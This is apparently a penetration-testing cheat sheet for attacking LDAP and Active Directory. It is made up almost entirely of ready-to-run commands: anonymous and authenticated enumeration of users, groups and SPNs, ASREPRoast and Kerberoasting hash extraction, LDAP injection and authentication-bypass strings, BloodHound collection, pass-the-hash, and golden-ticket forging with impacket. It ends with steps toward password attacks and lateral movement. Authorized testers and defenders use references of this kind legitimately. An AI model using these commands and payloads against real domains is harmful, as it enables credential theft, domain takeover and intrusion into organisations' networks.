Lightweight Directory Access Protocol

Environment Variables / Setup

export IP=
export DOMAIN=domain.local
export BASE_DN="DC=domain,DC=local"
export LDAPS_PORT=636

Phase 1: LDAP Service Discovery

Nmap LDAP Scripts

nmap -n -sV --script "ldap* and not brute" $IP -p 389,636

Service Detection

# Check LDAP service
nmap -p 389,636 $IP

# Check for LDAPS (secure LDAP)
nmap -p 636 --script ssl-enum-ciphers $IP

Phase 2: Anonymous LDAP Enumeration

Anonymous LDAP Bind

# Basic anonymous search
ldapsearch -x -H ldap://$IP -b "$BASE_DN"

# Get naming contexts
ldapsearch -x -H ldap://$IP -s base namingcontexts

# Get domain information
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=*)"

NetExec LDAP Enumeration

# Basic LDAP enumeration
netexec ldap $IP

# Anonymous enumeration
netexec ldap $IP -u '' -p ''

# Domain information
netexec ldap $IP -u '' -p '' --users
netexec ldap $IP -u '' -p '' --groups

Phase 3: LDAP User Enumeration

User Discovery

# Search for all users
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=user)" sAMAccountName

# Get user details
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=user)" sAMAccountName mail userPrincipalName

# Search for specific user
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(sAMAccountName=administrator)"

Group Enumeration

# Search for all groups
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=group)" cn

# Get group members
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(cn=Domain Admins)" member

# Administrative groups
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(|(cn=Domain Admins)(cn=Enterprise Admins)(cn=Schema Admins))" member

Phase 4: Computer and Service Enumeration

Computer Objects

# Search for computers
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=computer)" dNSHostName

# Service Principal Names (SPNs)
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(servicePrincipalName=*)" servicePrincipalName

# Get computer details
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=computer)" operatingSystem

Service Account Discovery

# Find service accounts with SPNs
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName

# Accounts trusted for unconstrained delegation (userAccountControl bit 524288, TRUSTED_FOR_DELEGATION)
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(userAccountControl:1.2.840.113556.1.4.803:=524288)"

Phase 5: LDAP with Credentials

# With username/password (prefer -W to be prompted: -w leaves the password in argv, ps output and shell history)
ldapsearch -x -H ldap://$IP -D "username@$DOMAIN" -w password -b "$BASE_DN" "(objectClass=user)"

# Get password policy
ldapsearch -x -H ldap://$IP -D "username@$DOMAIN" -w password -b "$BASE_DN" "(objectClass=domainDNS)" pwdProperties maxPwdAge

NetExec Authenticated Enumeration

# With credentials
netexec ldap $IP -u username -p password --users
netexec ldap $IP -u username -p password --groups
netexec ldap $IP -u username -p password --computers

# Password policy
netexec ldap $IP -u username -p password --pass-pol

# ASREPRoast
netexec ldap $IP -u username -p password --asreproast asrep.txt

# Kerberoasting
netexec ldap $IP -u username -p password --kerberoasting kerb.txt

Phase 6: LDAP Attack Vectors

LDAP Injection

# Test LDAP injection in web applications
# Common injection points: username fields, search parameters

# Basic injection tests:
*)(uid=*))(|(uid=*
*)(cn=*))(|(cn=*
*))%00

# Authentication bypass:
admin)(&
admin)(|(password=*

Null Session Testing

# Test anonymous access
ldapsearch -x -H ldap://$IP -b "" -s base "(objectclass=*)"

# Alternative null session test
ldapsearch -x -H ldap://$IP -D "" -w "" -b "$BASE_DN"

Phase 7: LDAPS (Secure LDAP)

LDAPS Enumeration

# Connect to LDAPS
ldapsearch -x -H ldaps://$IP:636 -b "$BASE_DN"

# Check certificate information
openssl s_client -connect $IP:636 -servername $DOMAIN

# Require StartTLS: -ZZ aborts the search if TLS cannot be negotiated. StartTLS upgrades a plaintext ldap:// connection (port 389); it is not a TLS version selector and is not meaningful on an ldaps:// URL.
ldapsearch -x -H ldaps://$IP:636 -ZZ -b "$BASE_DN"

Phase 8: Advanced LDAP Queries

PowerShell AD Queries (if Windows access)

# Get all users
Get-ADUser -Filter * -Properties *

# Get domain controllers
Get-ADDomainController -Filter *

# Get computers
Get-ADComputer -Filter * -Properties *

# Get groups
Get-ADGroup -Filter * -Properties *

# Get password policy
Get-ADDefaultDomainPasswordPolicy

Bloodhound Data Collection

# Using bloodhound-python
bloodhound-python -d $DOMAIN -u username -p password -gc $IP -c all

# Using SharpHound (on target)
./SharpHound.exe -c All -d $DOMAIN

Phase 9: LDAP Exploitation

LDAP Pass-the-Hash

# NetExec (ldap3 underneath) authenticating with an NTLM hash instead of a password
netexec ldap $IP -u username -H ntlm_hash --users

Golden Ticket via LDAP

# If krbtgt hash is obtained
impacket-ticketer -nthash krbtgt_hash -domain $DOMAIN -domain-sid domain_sid username

# Use ticket for LDAP queries
export KRB5CCNAME=username.ccache
ldapsearch -Y GSSAPI -H ldap://$IP -b "$BASE_DN"

Common LDAP Attributes

User Attributes

sAMAccountName         - Username
userPrincipalName      - User principal name
mail                   - Email address
memberOf               - Group membership
servicePrincipalName   - Service principal names
userAccountControl     - Account control flags
pwdLastSet             - Password last set time

Computer Attributes

dNSHostName            - DNS hostname
operatingSystem        - OS version
servicePrincipalName   - Service SPNs
userAccountControl     - Computer account control

Group Attributes

cn                     - Common name
member                 - Group members
memberOf               - Parent groups

LDAP Filter Examples

# All objects
(objectClass=*)

# Users only
(objectClass=user)

# Computers only
(objectClass=computer)

# Groups only
(objectClass=group)

# Service accounts
(&(objectClass=user)(servicePrincipalName=*))

# Admin accounts
(|(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local)(memberOf=CN=Enterprise Admins,CN=Users,DC=domain,DC=local))

# Enabled accounts
(!(userAccountControl:1.2.840.113556.1.4.803:=2))

# Accounts with passwords that don't expire
(userAccountControl:1.2.840.113556.1.4.803:=65536)

LDAP Enumeration Checklist

  • Anonymous LDAP bind testing
  • User enumeration and details
  • Group enumeration and membership
  • Computer enumeration and OS versions
  • Service account discovery (SPNs)
  • Password policy enumeration
  • Administrative group membership
  • Domain controller identification
  • Trust relationship discovery

Tools Summary

# Manual enumeration
ldapsearch, openssl

# Automated enumeration
netexec, enum4linux-ng, bloodhound-python

# Windows tools
Get-ADUser, Get-ADComputer, SharpHound.exe

Common LDAP Misconfigurations

  1. Anonymous LDAP access enabled
  2. Excessive information disclosure via LDAP
  3. Weak access controls on sensitive objects
  4. Unencrypted LDAP communications
  5. Service accounts with SPNs and weak passwords

Next Steps

Once LDAP enumeration succeeds:

  1. Use discovered users for password attacks
  2. Target service accounts for Kerberoasting
  3. Analyze group memberships for privilege escalation
  4. Map domain structure for lateral movement planning

Resources